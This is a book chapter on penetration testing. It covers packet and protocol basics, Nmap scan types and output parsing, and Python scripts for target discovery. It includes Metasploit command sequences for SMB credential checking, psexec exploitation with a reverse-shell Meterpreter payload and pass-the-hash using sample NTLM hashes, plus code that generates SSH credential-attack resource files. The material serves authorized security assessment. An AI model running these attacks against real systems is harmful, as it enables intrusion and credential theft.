Chapter 3. Identifying Targets with Nmap, Scapy, and Python
The identification of targets, network surveillance, and active reconnaissance are all terms that you may see in place of each other, in an effort to describe the initial process of assessing an environment. Depending on the framework you are using, such as PTES, a custom company methodology, or some other industry standard, these terms may mean different things. The important thing to remember is that you are looking to see which hosts are live in the approved scope and what services, ports, and features they have open and responsive.
These facets will determine what activities you will perform going from here. All too often, this stage is short-lived, and assessors jump right into exploiting systems that they see responding to scans. Instead of being methodical and researching possible targets, new assessors jump in with both feet. This may have served them well in previous engagements where they got to the goal quickly, but there are other impacts of approaching assessments in this way that many assessors do not realize.
They may miss even the lower hanging fruit—systems that are even easier to exploit. So if you, as an assessor, do not see this and a malicious actor may see it, then you may have an uncomfortable conversation with a client a few months down the road about why you missed this vulnerability. Keep in mind, however, that a penetration test is a snapshot in time, and environments are always changing. Controls and restrictions in the environment are adjusted, and systems are often reallocated. So, it is possible to have old vulnerabilities cropping up in new assessments. Being methodical means that you may be able to find more than one low-hanging target, which may help you build a rapport with your clients and in turn receive more work. Most importantly, it will point to the root causes of the flaws in the client's that will continue to generate control lapses if they are not fixed.
The biggest impact you will see from an assessor from someone jumping the gun, so to speak, is that they may start exploiting systems that have no significant purpose in the organization. This means that although they cracked a box, it did not provide any value from moving through the networks, or the vulnerability was not exploitable, and as such, it could be considered a false positive. So, all of those initial scans have to be restarted, losing precious time and increasing the chances that the objectives of the engagement will not be met. To understand how to scan the network, you have to first understand the network frames, packets, messages, and datagrams so that you can manipulate each of them.
Understanding how systems communicate
There are entire series of books dedicated to how networks communicate; this chapter will begin with some very basic information. If you have already understood this data, I encourage you to read through it as a refresher, just in case some new or different details are covered. Additionally, there are some references to the sizes of header components and payloads. These are specifics on how the network protocols are referenced, and how the protocols could be different depending on what data is being transmitted and/or the differences in specialty networks.
As a system generates data, it is sent down through the system's Transmission Control Protocol (TCP) / Internet Protocol (IP) stack. This packages the data into something that can be transmitted over the wire. If you have heard of the Open Systems Interconnect (OSI) model, then you know that this is how people discuss how systems process data, whereas the TCP/IP Model is the way systems actually operate.
Note
Every system has a TCP/IP stack, which represents the implementation of the TCP/IP Model. It is important to understand that a socket is what communication is executed through. This is done by linking source and destination IP addresses, and source and destination ports.
There is a range of ports called the ephemeral port range. It varies from system to system in scope. These ports are also known as dynamic ports and are used by clients as the source ports for communication over a socket. They can also be destination ports for well-known services on servers, provided the known port is designed for communication brokerage as against destination. Services such as File Transfer Protocol (FTP) use this technique. The reason you must know this is that these ephemeral ports typically do not need to be scanned while you are trying and identifying targets, because they are rarely service initiators. As such, they are short-lived and are associated for specific communication streams only.
Tip
Remember that administrators often hide known services in these higher port ranges to try and create situations wherein the services will not be identified. This is known as security by obscurity. When it comes to scanning many hosts, you may need to avoid scanning these ranges because you have to spend more time doing so. If you have not identified many services, or there are a few hosts in the target network, you may want to include these in your scan range.
Layer 4 headers represent the TCP and User Datagram Protocol (UDP) headers and the targeting connection of ports for a specific IP. Layer 3 headers represent the IP and Internet Control Message Protocol (ICMP) headers. Layer 2 headers are related to frame headers, trailers, and the Address Resolution Protocol (ARP). The following diagram depicts the method of frame generation to communicate between two systems:

Now that you have seen how the frame is generated from the top down, let's move back up the stack to see how each component is deconstructed to get to the data. From there, you start with the Ethernet frame.
The Ethernet frame architecture
A frame is the way in which data travels from host to host, and there are a number of components that make up a frame. You can read a substantial amount of information related to frames, on wiki's and engineering documents, but there are a couple of things you need to understand. Frames communicate via a hardware address known as a Media Access Control (MAC) address. Frames are slightly different for wireless networks and Ethernet networks. Also, at the end of a frame is a checksum. It is a basic mathematical check meant to verify the integrity of data after it has been transmitted over the wire. The following is an screenshot of an Ethernet frame with the end destination of a TCP port:

The next screenshot represents the contents of a frame with the ending destination of a UDP port:

Layer 2 in Ethernet networks
Frames are used to communicate within broadcast domains or locations inside default gateways, or prior to passing a router. Once a router is passed, the interface of its router's hardware address is used for the next broadcast domain. These are also typically sent in frames depending on the communication protocols between the devices. This is done over and over again until the frame reaches its destination delineated by the IP address. This is very important to understand because if you wish to run most Man-in-the-Middle (MitM) attacks with tools such as Responder or Ettercap, you have to be within the Broadcast Domain, as they are layer 2 attacks.
Layer 2 in wireless networks
The concept of wireless attacks is very similar, as you must be within range of the Service Set Identifier (SSID) or the actual wireless network name. Your communication train is slightly different depending on the design of the wireless network, but you use Access Points (AP) that are differentiated by Basic Service Set Identifiers (BSSIDs), which is a fancy name for the MAC address of the AP.
Once you are associated and authenticated into the network through the AP, you are part of the Basic Service Set (BSS) or the component of the enterprise network, but are limited to the range of the AP.
If you move into a wireless network and associate with a new AP because the signal is better, you will be part of a new BSS. All BSS are part of the Enterprise Service Set (ESS); interestingly enough, if the wireless network contains more than one AP, it is an ESS. To be able to communicate with wireless engineers, you must understand that if you are in an enterprise wireless network, the SSID is actually known as an Enterprise SSID (ESSID). Now that you have an understanding of layer 2 headers, it's time to look at IP headers.
Note
Depending on whose network documentation you are reading, an ESS is created if there is a Distribution System (DS) and an AP, or two APs and a DS. A DS is just a fancy name for a nonwireless network that connects APs. This is important to keep in mind because depending on the brand of product a company is using, the lingo may be slightly different.
The IP packet architecture
An IP header contains the data necessary for communicating through a network that uses IP addresses. This allows the communication to flow beyond Broadcast Domains. The following diagram shows an example header for IPv4 header:

You may have read that IPv4 is nearing its end, or that it is getting to be that way. Well, the replacement, as you may have heard, is IPv6. This new address scheme provides a significant number of new host addresses, but as you can see in the comparison of the two header types, there are far less fields. One thing to know is that there are a large number of vulnerabilities associated with IPv6 compared to IPv4.
There are many reasons for this, but the most significant reason is that when organizations apply security concepts to their network, they forget that IPv6 is supported by default and is turned on. This means that when they configure protection mechanisms, they are usually using the IPv4 address. If IPv6 is enabled and the security devices are not aware of the different address types in the network or the associations with those devices, attacks can go unnoticed.
Think of it in this way: let's say you have a house with a front door and a back door, and there is a security guard only at the front door. The house has the same physical address, but the manners in which you get inside are completely different because it has two different doors. This security concept is very similar, and as such, organizations should remember that IPv6 can open up new holes into an organization if it does not consider the impact carefully. The following diagram shows an example of an IPv6 packet structure:

The TCP header architecture
A TCP packet header is much larger than a UDP packet header, relatively speaking. It has to accommodate the necessary sequencing, flags, and control mechanisms. Specifically, the packet is there to handle session setup and teardown using a number of different flags. These flags can be manipulated to get responses from the target system as an attacker wants.
The following figure shows a TCP header:

Understanding how TCP works
Before you understand how to execute scans and identify hosts, you need to understand how the TCP communication stream works. TCP is a connection-oriented protocol, which means that a session is established between two systems. Once this has taken place, the information that was originally destined for communication can be sent, and when all of the data has been sent, the connection is closed.
The TCP three-way handshake
The TCP handshake is also known as the three-way handshake. The meaning of this is that three messages are sent back and forth between two systems before a communication socket is established. These three messages are SYN, SYN-ACK, and ACK. The system that is trying to initiate a connection starts with a packet that has the SYN
flag set. The answering system returns a packet with the SYN
and ACK
flag sets. Finally, the initiating system returns a packet to the original target system with the ACK
flag set. In older systems, if the communication train was not completed, there could be unintended consequences. Today, most systems are smart enough to just reset (RST) the connection or close it gracefully.
The UDP header architecture
Whereas TCP is a connection-oriented protocol, UDP is a simple connectionless-oriented protocol. As you can see in the following image, the header for UDP packets is significantly simpler. This is because there is far less overhead for UDP to maintain a socket as opposed to TCP.

Understanding how UDP works
UDP establishes a communication stream with a listening port. That port accepts the data and runs it up the TCP/IP stack as necessary. While TCP is needed for synchronized and reliable communication, UDP is not. Multimedia presentations are the best example of what UDP communication is used for. If you are watching a movie, you wouldn't care about a packet that might have been lost, because even if it is resent, it would make no sense to present it after the movie has moved on from the initial hiccup in presentation. Now that you have understood the basics of system communication, you need to understand how different flags are used to gather the required data using Nmap scan techniques.
Note
Each scan has a different purpose, and specific flags elicit different responses from operating systems depending on whether they are received out of order or not. The nmap port scanning techniques web page at http://nmap.org/book/man-port-scanning-techniques.html details this information succinctly.
Understanding Nmap
If there is one tool that is ubiquitous through most top-tier and new assessor toolkits, it is nmap. You may find different exploitation frameworks, web application tools, and other preferences, but nmap is a staple tool for many forms of assessment. Now, this is not to say that there are no other tools that can be executed with similar capabilities; it's just that they are not as capable. This includes tools such as AngryIP, HPing, FPing, NetScan, Unicorn scan, and others. From all of these tools, only two stand out as significantly different, and they are HPing and Unicorn scan.
The biggest mistake I see new assessors making with nmap is executing more than one scan at a time from the same host. What they do not realize is that nmap uses the integrated TCP/IP stack of the host operating system. This means that any additional scan executed does not speed the results; instead, the multiple sessions must be handled at the same time by the operating systems TCP/IP stack. This in turn will not only slow down the results of each scan, but also increase errors, as each received packet can impact the results depending on the instance it was received by.
Each missing packet may be resent; this means that the scans slow down, not only because of the number of packets being resent, but because of the inconsistent results and the constrained TCP/IP stack. This means that you can execute only one instance of an nmap scan per host. Therefore, you must be as efficient as possible. So what is the solution? You can use nmap to execute a scan using the host TCP/IP stack and the Unicorn scan, which contains its own TCP/IP stack. The truth is that this entire situation can be avoided by efficiently using nmap instead of using multiple tools at once, which eats up relative clock cycles.
So, besides dealing with the limitations of resident TCP/IP stacks, there is also the limitation of how detailed packets can be manipulated through nmap. HPing provides the ability to relatively easily create custom packets that meet a specific intent. Despite this customization, HPing is efficient only at executing a test against a single host in a customized manner. If multiple hosts need simple pings with relative customization, FPing should be the tool of choice. This is especially because the results produced in Standard Out (STDOUT) by FPing are easily parsable for producing efficient and useful results. This is not to say that nmap is not a highly configurable tool, but rather to point out that it is not a replacement for an experienced and smart assessor, and that each tool has its place. So, you need to understand its limitations and supplement it as necessary.
Inputting the target ranges for Nmap
Nmap can have targets input either by Standard Input (STDIN), which is when you pass data directly from the Command-line interface (CLI), or via a file. For the CLI, this can be done in a variety of ways to include a range of IP addresses, and the Classless Inter-Domain Routing (CIDR) notation of the IP addresses. For files, the IP addresses can be passed by the methods mentioned to include CIDR notation, IP addresses, and ranges and also by an IP list separated by line breaks or carriage returns. To pass data by the CLI all that the user has to do is present the piece at the end of the command, as follows:
nmap -sS -vvv -p 80 192.168.195.0/24
For a file input method, all that is required is the -iL
option followed by the filename:
nmap -sS -vvv -p 80 -iL nmap_subnet_file
Executing the different scan types
Nmap has a large number of different supported scans, but not all will be covered here. Instead, we will focus on the scans that you will use the most in your assessments. The four scans you primarily use are the TCP connection scan (also known as the full-connection scan), the SYN scan (also known as the half-open or stealth scan), the ACK scan, and the UDP scan. These are highlighted to the level set knowledge for future scripting efforts.
Note
When performing external testing, you may get automatically blocked or shunned. This could be executed by the client's Internet Service Provider (ISP) or their Information Technology (IT) team. You should always have a backup public IP address in case your primary gets blocked. Then, just avoid doing the same thing that blocked you earlier. Next, document when you see the client doing a proactive block, as this positive activity highlights where they should consider continuing their investment and where they have gaps.
Executing TCP full connection scans
The TCP connection scan is one of the loudest or easiest to detect scans nmap has, but it is also one of the best for eliminating false positives. In earlier days, Incident Response (IR) and security teams paid a lot of attention to what was scanning the perimeter so that they could determine when they were going to be attacked. Times changed, as the amount of noise generated at the perimeter became excessive, and much of the access that was previously seen was mitigated by more advanced firewalls. Today, IR teams are again paying attention to the perimeter and using the activity they see to correlate events and potential future attempts to get into the network, or follow-up related to already executed attacks.
The TCP connect scan may provide the most accurate results, but automatic shunning mechanisms often block the source of the scan at the Internet Service Provider (ISP). To execute a TCP scan, all you have to do is indicate the associated scan type with -sT
, as seen here:
nmap -sT -vvv -p 80 192.168.195.0/24
Note
I have assessed many an organization, which could be scanned with full connection scans only, as they would immediately shun the connection if an SYN scan was executed. The trick is to know your target and how advanced their environment is. Much of this can be determined during the pre-engagement phases.
Executing SYN scans
SYN scans are a type of TCP scan, and they are the most prominent scans you will probably run during your engagements. The reason is that they are much faster than TCP connection scans, and much quieter. However, they are not suitable for environments with extremely old or sensitive equipment types. Though most modern systems have no problem with closing a connection if it does not receive an ACK response in a timely manner, others could have problems. There have been repeated cases in the past where some legacy systems could have had a Denial of Service (DoS) situation if the connection was not completed. Today, these are much rarer, but always consider your customers' concerns, as they know their environment better than you do.
SYN scans are simply executed using the -sS
flag, as shown here:
nmap -sS -vvv -p 80 192.168.195.0/24
Executing ACK scans
ACK scans are the rarest of the three TCP scan types, and they may not be as directly useful as you think. Let's see when you would use an ACK scan. It is a slow scan, so you would use it if an SYN or TCP scan does not provide you with the results you needed. Nmap is pretty smart today; you usually don't need to perform the different types of scans to validate the type of target you are hitting. So, you would be trying to identify a resource that a full connection scan does not work on. This means that you may not be able to connect to the host for further attacks, because you were unable to complete a three-way handshake.
So where are ACK scans useful? People often ask this, and the answer is, "Firewalls." ACK scans are great for mapping firewall rule sets. Some systems react very strangely to ACK scans and provide additional data in return, so make sure you have tcpdump
running on either an inline tap or on your system when you execute the ACK scan. The following is an example of how to execute an ACK scan. Run the command as follows:
nmap -sA -vvv -p80 192.168.195.0/24
Executing UDP scans
You will see tons of blog posts and books and come across several training events that highlight the fact that UDP is a protocol that is often overlooked. In future chapters, we will highlight how dangerous this really is to an organization. UDP scans are extremely slow, and since there are just as many ports for UDP as TCP, it will take a substantial amount of time to scan for them. Additionally, UDP scans—for lack of a better term—lie. They will often report things as filtered/open, which basically means that it does not know.
This can be infuriating in very large environments. It also does not have the full capability to grab most of the UDP port service information. The most common ports have specially packaged scan data, which allows nmap to determine whether the port is really open and what service is there, because services are not always on the default port. When services are moved to UDP ports, there is an impact on the default scan data returned by nmap, as opposed to TCP scans, for which the impact is not so much.
To execute a UDP scan, all that is needed is the flag for the scan set to -sU
, as shown here:
nmap -sU -vvv -p161 192.168.195.0/24
Executing combined UDP and TCP scans
So now, you know how to run your primary scans, but running both TCP and UDP scans one after the other can take very long periods of time. To save time, you can combine the scanning of resources by targeting ports for both types of scans. Be smart about this, however; if you use a lot of ports in this scan, it will take forever to complete. So, this scan is great for targeting the top ports that you can use to identify vulnerable resources that have the best chance of being compromised, such as the following:

To execute a combined scan, all that is needed is to flag the two types of scans you want to use and itemize the ports you want to scan for each protocol. This is done by providing the -p
option, followed by U:
for the UPD ports and the T:
for the TCP ports. See the following example, which highlights only a few ports for the sake of brevity:
nmap -sS -sU -vvv -p U:161,139 T:8080,21 192.168.195.0/24
Skipping the operating system scans
I have seen a number of new assessors jump all over the operating system scan for nmap with gleeful excitement. It is one of the quickest ways my team members know of of identifying someone who does not assess enterprise environments regularly. Here are the reasons:
- Operating system scans are very noisy
- It can bring legacy systems down, because it performs chained scans to determine the responses and validate the system type
- Against an old or legacy system, it can be damaging
- In the past, certain printers would have issues, to include printing ink soaked black pages until they were shut off or ran out of paper
The biggest reason for seasoned assessors not using this scan, is because it provides little value today. You can identify the details this scan provides faster, more easily, and more quietly with other methods. For example, if you see port 445
open, it is either a system running a Samba variant or a Windows host—usually. Learning the ports, service labels, and versions of each operating system will do a better job in identifying the OS and version than this scan will. Additionally, if it is a system that you cannot identify by this method, it is unlikely that nmap will be able to do it either, of course this is depending on your skill level.
Tip
As you gain experience, you learn how to passively identify live hosts using tools such as Responder, tcpdump, and Wireshark. This means that you don't need to scan for hosts and, in essence, you are being quieter. This is also a better simulation of real malicious actors.
Different output types
Nmap has four output types, and they are extremely useful depending on the situation. They are to the screen, STDOUT
, or to three different file types. These file types have different purposes and advantages. There is the nmap output, which looks identical to STDOUT
but just in a file; this is done with -oN
. Then, there are the Grepable
and eXtensible Markup Language (XML) outputs, described as follows. All outputs can be produced at the same time using the -oA
flag.
Understanding the Nmap Grepable output
There is the Grepable output, which—to tell the truth—is not that great for greping out data. It can provide an easy means to extract components of data to build lists quickly and easily, but to properly parse it with grep
, sed
, and awk
, you actually have to insert characters to signify where data should be extracted. The Grepable output can be executed by tagging the -oG
flags.
After you have a Grepable file, the most useful way of parsing the data is by keying on certain components of it. You are usually looking for open ports related to specific services. So, you can extract these details by executing commands such as the following:
cat nmap_scan.gnmap | grep 445/open/tcp | cut -d" " -f2 >> /root/Desktop/smb_hosts_list
The example shows a Grepable file being pushed to STDOUT
and then piped to grep
, which searches for open 445 ports
. This can be done with grep
and cut only, but it is very easy to read and understand. Once the ports are found, cut extracts the IP addresses and pushes them to a flat file known as smb_hosts_lists
. If you look at the nmap_scan.gnmap
file, you would potentially see lines that contain details such as these:
Host: 192.168.195.112 () Ports: 445/open/tcp/
As you can see, the line contains the 445/open/tcp
detail, which allows us to target that specific line. We then cut using the space as a delimitating key and select field two, where, if you count the data fields by spaces, you find the IP address. This technique is very common and is useful for quickly identifying what is open by the IP address and creating multiple flat files based on the service or port.
As shown in Chapter 1, Understanding the Penetration Testing Methodology, you use the rhosts
field in the Metasploit modules to target hosts by CIDR notation or range. When you create flat files, you can use Metasploit modules to hit a list of hosts instead by referencing the flat file. To run the Metasploit console, execute this command:
msfconsole
If you are running Metasploit Professional from the command line, use the following command:
msfpro
Now see this example, wherein we will try and see whether the password we cracked earlier works on any host in the rest of the network:
use auxiliary/scanner/smb/smb_login set SMBUser administrator set SMBPass test set SMBDomain Workgroup set RHOSTS file:/root/Desktop/smb_hosts_list run
The use
command selects the module you want to use—the smb_login
module in this case—which verifies Server Message Block (SMB) credentials. The SMBUser
set chooses the username you are going to execute this attack against. The SMBPass
set selects the password that is going to be used in this module. The set SMBDomain
field allows you to set the domain for the organization. The run
command executes the auxiliary module. In earlier years, you had to use run
to execute an auxiliary module and exploit for an exploit module. Today, these are really interchangeable, with the exception of post exploitation modules, which require run
as highlighted at https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/.
Tip
If you are attacking with a local account, you should set the domain to workgroup. When attacking a domain account, you should set the domain to the actual domain of the organization.
Metasploit Professional is a tool that helps optimize penetration testing efforts and it has a web Graphical User Interface (GUI). Metasploit pro provides a lot of great features, but if you need to pivot through multiple network tiers protected by firewalls, the console is the best option. To learn how to execute an automatic pivot, you can find the details at manual pivot, refer to https://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot, which covers port-based pivoting, manual routing, and SOCKS proxies.
This method of attack is very common; you find out the credentials, identify the services the credentials may work on, and then build flat files to target hosts. Next, you reference those flat files to check the hosts for a vulnerability. Once you have verified those hosts as vulnerable, you can exploit them with Pass-the-Hash (PtH) using a Process Execution (PSEXEC) attack (if you had the hash) or a standard-credentialed PSEXEC, as shown in the following code:
Tip
PtH is an attack that takes advantage of a native Windows weakness related to how systems authenticate on a network. Instead of requiring a Challenge/Response authentication method, the hashed password can be passed directly to the host. This means that you do not have to crack the Local Area Network Manager (LM) or New Technology LM (NTLM) hashes. Many Metasploit modules can use either credentials or hashes against SMB services.
msfconsole use exploit/windows/smb/psexec set SMBUser administrator set SMBPass test set SMBDomain Workgroup set payload windows/meterpreter/reverse_tcp set RHOST 192.168.195.112 set LPORT 443 exploit -j
The set payload
command chooses the payload that is going to be dropped on the host and then executed. The reverse_tcp
payload dials back to the attack box to establish a connection. Had it been a bind
payload, the attack box would have directly connected to a listening port after execution. RHOST
and LPORT
signify the target host we want to connect to and the port on the attack box that we want to listen to for the returning communication. The exploit -j
runs the exploit and then backgrounds the results, which allows you to focus on other things, returning to the session as needed with session -i <session number>
. Keep in mind that you do not require cracked credentials to execute smb_login
or the psexec
; instead, you can just PtH. In that case, the text would look like the following code for the smb_login
command:
Note
All payloads that are dropped on the box are deleted when the process execution completes. If the execution process is interrupted, the payload may stay on the system. Better secured environments that use tools that monitor processes may have instances of this if the tools are not correctly configured to delete the generator of those detected processes.
msfconsole use auxiliary/scanner/smb/smb_login set SMBUser administrator set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 set SMBDomain Workgroup set RHOSTS file:/root/Desktop/smb_hosts_list run
The following configuration would be for the psexec
command:
msfconsole use exploit/windows/smb/psexec set SMBUser administrator set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 set SMBDomain Workgroup set payload windows/meterpreter/reverse_tcp set RHOST 192.168.195.112 set LPORT 443 exploit -j
Now that you have understood the purpose and benefits of the nmap grepable
output, let's look at the benefits of the XML output. One item should be noted before moving on, which will help you understand what the XML benefits are. Look at the line from the nmap grepable
output. You can see that there are very few special characters for differentiating the fields of data; this means that you can extract only small components of information with ease. To get larger quantities, you have to insert delineators using sed
and awk
. This is a painful process, but thankfully, you have the solution at hand—the XML output.
Understanding the Nmap XML output
XML builds trees of data that use child and parent components to label datasets. This allows easy and direct parsing of data using specific label grabs after walking the tree that lists the parent and child relationships. Most importantly, because of this, XML outputs can be imported by other tools, such as Metasploit. You can easily output to only XML using the -oX
option. More details of these benefits will be covered in later chapters, specifically when parsing XML using Python in Chapter 9, Automating Reports and Tasks with Python, to help automatically generate report data.
The Nmap scripting engine
Nmap has a number of scripts that provide unique capabilities for assessors. They can help identify vulnerable services and exploit systems or interact with complex system components. These scripts are coded in a language called Lua, which will not be covered here. These scripts can be found at /usr/share/nmap/scripts
within Kali. Each of these scripts can be called using the --script
option and then called in a comma-delimitated list. Make sure you know what each script does before executing it against a target, because there may be unintended consequences on target systems.
Note
More details about nmap
scripts can be found at http://nmap.org/book/man-nse.html. Specific details about nmap
scripts can be found at http://nmap.org/nsedoc/, along with their purposes and category associations.
Scripts can be called by the category they are part of or removed from the categories you do not want them to be part of. As an example, you can see that the following command runs the nmap
tool with all default or safe scripts that do not start with http-
:
nmap --script "(default or safe) and not http-*" <target IP>
By now, you should have a pretty good understanding of how to use nmap and the capabilities within it. Let's look at being efficient with nmap. This is because the biggest limiting component of a penetration test is time, and during that time period, we need to succinctly identify vulnerable targets.
Being efficient with Nmap scans
Nmap is a great tool, but you can be limited by poor network design, large target sets, and unrestricted port ranges. So, the trick to being efficient is to limit the number of ports you scan for until you know which targets are live. This can be done by targeting subnets that have live devices and only scanning those ranges. The easiest way to do this is to look for default gateways that are active in a network. So, if you see that your default gateway is 192.168.1.1
, it is likely that in this Class C network, other default gateways may be active in areas such as 192.168.2.1
. Pinging the default gateway is a process that is a little noisy, but it is typically consistent with most of the nominal network traffic.
Nmap has a built-in capability that lets you target the statistically more common ports using the --top-ports
option and then follow it up with a number. As an example, you could look for the top 10 ports using the --top-ports 10
option. This statistics was discovered by long-term scanning of Internet-facing hosts, which means that the statistics is based on what would be exposed to the Internet. So, remember that if you are doing an internal network assessment, this option may not provide the expected results.
As an assessor, you are often provided a range of targets to assess. Sometimes, this range is extremely large. This means that you need to try and identify live segments by seeing which locations' default gateways are active. Each active default gateway and the relevant subnet will tell you where you should scan. So, if you have a default gateway of 192.168.1.1
and your subnet is 255.255.255.0
or /24
, you should check for other default gateways from 192.168.2.1
to 192.168.255.1
. As you ping each default gateway, if it responds, you know that there are likely live hosts in that subnet. This can be done easily with well-known bash for
loop:
for i in `seq 1 255`; do ping -c 1 192.168.$1.1 | tr \\n ' ' | awk '/1 received/ {print $2}'; done
This means that you have to look for your default gateway address and subnet to verify the details for each interface you are using. What if you could automate the process of finding these system details with a Python script? To begin this journey, start by extracting the details of the interfaces with the netifaces
library.
Determining your interface details with the netifaces library
We demonstrated how to find interface details using a Python script in Chapter 2, The Basics of Python Scripting. It was designed to find details on any system regardless of libraries, but it only found addresses based on a list of interface names provided. Also, it was a script that would not be considered very tight. Instead, we can use the netifaces
library for Python to iterate through the addresses and discover the details.
This script uses a number of functions to accomplish specific tasks. The functions included are get_networks
, get_addresses
, get_gateways
, and get_interfaces
. These functions do exactly what you expect them to. The first function, get_interfaces
, finds all the relevant interfaces for that system:
def get_interfaces(): interfaces = netifaces.interfaces() return interfaces
The second function identifies the gateways and returns them as a dictionary:
def get_gateways(): gateway_dict = {} gws = netifaces.gateways() for gw in gws: try: gateway_iface = gws[gw][netifaces.AF_INET] gateway_ip, iface = gateway_iface[0], gateway_iface[1] gw_list =[gateway_ip, iface] gateway_dict[gw]=gw_list except: pass return gateway_dict
The third function identifies the addresses for each interface, which includes the MAC address, interface address (typically IPv4), broadcast address, and network mask. All of these details are sourced by passing the function for the interface name:
def get_addresses(interface): addrs = netifaces.ifaddresses(interface) link_addr = addrs[netifaces.AF_LINK] iface_addrs = addrs[netifaces.AF_INET] iface_dict = iface_addrs[0] link_dict = link_addr[0] hwaddr = link_dict.get('addr') iface_addr = iface_dict.get('addr') iface_broadcast = iface_dict.get('broadcast') iface_netmask = iface_dict.get('netmask') return hwaddr, iface_addr, iface_broadcast, iface_netmask
The fourth, and last, function identifies the gateway IP from the dictionary provided by the get_gateways
function to the interface. It then calls the get_addresses
function to identify the rest of the details about the interface. All of this is then loaded into a dictionary that is keyed by the interface name:
def get_networks(gateways_dict): networks_dict = {} for key, value in gateways.iteritems(): gateway_ip, iface = value[0], value[1] hwaddress, addr, broadcast, netmask = get_addresses(iface) network = {'gateway': gateway_ip, 'hwaddr' : hwaddress, 'addr' : addr, 'broadcast' : broadcast, 'netmask' : netmask} networks_dict[iface] = network return networks_dict
Note
The full script code can be found at https://raw.githubusercontent.com/funkandwagnalls/pythonpentest/master/ifacesdetails.py.
The following screenshot highlights the execution of this script:

Now, we know that this is not directly related to scanning and identifying targets, but it is for eliminating targets. Those targets are your system; you will see once you start assessing some systems automatically that you will not want your system to be in the list. We are going to highlight how to scan systems with the nmap libraries, identify the targetable services, and then eliminate any IP address that may be our system.
Nmap libraries for Python
Python has libraries that allow you to execute nmap
scans directly, either through the interactive interpreter or by building multifaceted attack tools. For this example, let's use the nmap
library to scan our local Kali instance for a Secure Shell (SSH) service port. Make sure that the service has started by executing the /etc/init.d/ssh start
command. Then install the Python nmap
libraries with pip install python-nmap
.
You can now execute a scan by directly using the libraries, importing them, and assigning nmap.PortScanner()
to a variable. That instantiated variable can then be used to execute scans. Let's perform an example scan within the interactive interpreter. The following is an example of a scan for port 22
, done using the interactive Python interpreter against the local Kali instance:

As you can see, it's a dictionary of dictionaries that can each be called as necessary. It takes a little more effort to execute a scan through the interactive interpreter, but it is very useful in environments you may have gotten a foothold in that have Python, and it will allow you to install libraries during the course of your engagement. The bigger reason for doing this is scripting of methods that will make targeted exploitation easier.
To highlight this, we can create a script that accepts CLI arguments to scan for specific hosts and ports. Since we are accepting arguments from the CLI, we need to import the sys libraries, and because we are scanning with the nmap
libraries, we need to import nmap
. Remember to use conditional handlers when importing libraries that are not native to Python; it makes the maintainability of tools simple and it is far more professional:
import sys try: import nmap except: sys.exit("[!] Install the nmap library: pip install python-nmap")
Once the libraries have been imported, the script can have the argument requirements designed. We need at least two arguments. This means that if there are less than two arguments or more than two, the script should fail with a help message. Remember that the script name counts as the first argument, so we have to increment it to 3
. The results of the required arguments produce the following code:
# Argument Validator if len(sys.argv) != 3: sys.exit("Please provide two arguments the first being the targets the second the ports") ports = str(sys.argv[2]) addrs = str(sys.argv[1])
Now, if we run the nmap_scanner.py
script without any arguments, we should get an error message, as shown in the following screenshot:

This is the basic shell of the script into which you can then build the actual scanner. It is a very small component that amounts to instantiating the class and then passing to it the address and ports, which are then printed:
scanner = nmap.PortScanner() scanner.scan(addrs, ports) for host in scanner.all_hosts(): if not scanner[host].hostname(): print("The host's IP address is %s and it's hostname was not found") % (host) else: print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
This fantastically small script provides you with the means to quickly execute the necessary scan, as shown in the following screenshot. This test shows the system's virtual interface, which I have tested with both the localhost identifier and the interface IP address. There are two things to note when you are scanning with the localhost identifier: you will receive a hostname. If you are scanning the IP address of the system without querying a name service, you will not be able to identify the host name. The following screenshot shows the output of this script:

Note
This script can be found at https://raw.githubusercontent.com/funkandwagnalls/pythonpentest/master/nmap_scannner.py.
So, the big benefit here is that now you can start automating exploitation of systems—to a point. These types of automation should be relatively benign so that if something fails, it causes no damage or impact to the environment's confidentiality, integrity, or availability. You can do this through the Metasploit Framework's Remote Procedure Call (MSFRPC), or by automatically building resource files that you can execute. For this example, let's simply build a resource file that can execute a credential attack to check for default Kali credentials; you did change them, right?
We need to generate a file by writing lines to it similar to the commands we would execute in the Metasploit Console. So look at the ssh_login
module for Metasploit by performing search ssh_login
, and then show the options after loading the console with msfconsole
. Identify the required options. The following screenshot shows an example of items that can, and must, be set:

Some of these items are already set, but the components that are missing are the remote host's IP address and the credentials we are going to test. The default port is set, but if your script is designed to test for different ports, then this must be set as well. You will notice that the credentials are not required fields, but to execute a credential attack, you do need them. To create this, we are going open and create a file using the write
function within Python. We are also going to set the buffer size to zero so that data is automatically written to the file, unlike taking the operating system defaults to flush the data to the file.
The script is also going to create a separate resource file that contains the IP address for each host that it identifies. The additional benefit that comes from running this script is that it creates a list of targets that have SSH enabled. In future, you should try to build scripts that are not designed for testing a single service, but this is a good example to get you started. We are going to build on the previous script concepts, but again we are going to build functions to modularize it. This will allow you to convert it into a class more easily in future. First, we add all the functions of the ifacedetails.py
script and the libraries imported. We are then going to modify the argument code of the script so that it accepts more arguments:
# Argument Validator if len(sys.argv) != 5: sys.exit("[!] Please provide four arguments the first being the targets the second the ports, the third the username, and the fourth the password") password = str(sys.argv[4]) username = str(sys.argv[3]) ports = str(sys.argv[2]) hosts = str(sys.argv[1])
Now build a function that is going to accept the details passed to it that will create a resource file. You will create string variables that contain the necessary values that will be written to the ssh_login.rc
file. The details are then written to the file using the simple open command with the relevant bufsize
of 0
, as mentioned earlier. The file now has string values written to it. Once the process is completed, the file is closed. Keep in mind when you look at the string values for the set_rhosts
value. Notice that it points to a file that contains one IP address per line. So, we need to generate this file and then pass it to this function:
def resource_file_builder(dir, user, passwd, ips, port_num, hosts_file): ssh_login_rc = "%s/ssh_login.rc" % (dir) bufsize=0 set_module = "use auxiliary/scanner/ssh/ssh_login \n" set_user = "set username " + username + "\n" set_pass = "set password " + password + "\n" set_rhosts = "set rhosts file:" + hosts_file + "\n" set_rport = "set rport" + ports + "\n" execute = "run\n" f = open(ssh_login_rc, 'w', bufsize) f.write(set_module) f.write(set_user) f.write(set_pass) f.write(set_rhosts) f.write(execute) f.closed
Next, let's build the actual target_identifier
function, which will scan for targets using the nmap library using the port and IPs supplied. First, it clears the contents of the ssh_hosts
file. Then it checks whether the scan was successful or not. If the scan was successful, the script initiates a for
